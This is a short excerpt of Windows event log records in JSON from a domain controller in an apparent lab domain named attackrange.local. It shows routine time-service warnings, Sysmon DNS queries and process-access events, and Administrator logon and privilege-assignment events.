{"EventTime":"2020-08-01 07:53:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":12,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76832,"ProcessID":1216,"ThreadID":1356,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"Time Provider NtpClient: This machine is configured to use the domain hierarchy to determine its time source, but it is the AD PDC emulator for the domain at the root of the forest, so there is no machine above it in the domain hierarchy to use as a time source. It is recommended that you either configure a reliable time service in the root domain, or manually configure the AD PDC to synchronize with an external time source. Otherwise, this machine will function as the authoritative time source in the domain hierarchy. If an external time source is not configured or used for this computer, you may choose to disable the NtpClient.","Opcode":"Info","EventReceivedTime":"2020-08-01 07:53:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":134,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76833,"ProcessID":1216,"ThreadID":1488,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"NtpClient was unable to set a manual peer to use as a time source because of DNS resolution error on 'time.windows.com,0x8'. NtpClient will try again in 15 minutes and double the reattempt interval thereafter. The error was: No such host is known. (0x80072AF9)","Opcode":"Info","ErrorMessage":"No such host is known. (0x80072AF9)","RetryMinutes":"15","DomainPeer":"time.windows.com,0x8","EventReceivedTime":"2020-08-01 07:53:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76834,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The W32Time service entered the running state.","param1":"W32Time","param2":"running","EventReceivedTime":"2020-08-01 07:53:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2390,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:39.673\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:39.673","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"1460","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2391,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:39.673\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nProcessId: 1312\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:39.673","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"1460","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 07:53:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2392,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:44.454\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:44.454","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4776,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14336,"OpcodeValue":0,"RecordNumber":220293,"ProcessID":864,"ThreadID":1104,"Channel":"Security","Message":"The computer attempted to validate the credentials for an account.\r\n\r\nAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\r\nLogon Account:\tAdministrator\r\nSource Workstation:\tWIN-DC-6178966\r\nError Code:\t0x0","Category":"Credential Validation","Opcode":"Info","PackageName":"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0","TargetUserName":"Administrator","Workstation":"WIN-DC-6178966","Status":"0x0","EventReceivedTime":"2020-08-01 07:53:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220294,"ProcessID":864,"ThreadID":1104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:53:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220295,"ProcessID":864,"ThreadID":1104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x446B3\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x446b3","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220296,"ProcessID":864,"ThreadID":1104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x446B3\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x446b3","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2393,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:44.454\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:44.454","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2394,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:44.454\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:44.454","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2395,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.235\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001087BC0200}\r\nTargetProcessId: 2888\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.235","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001087BC0200}","TargetProcessId":"2888","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
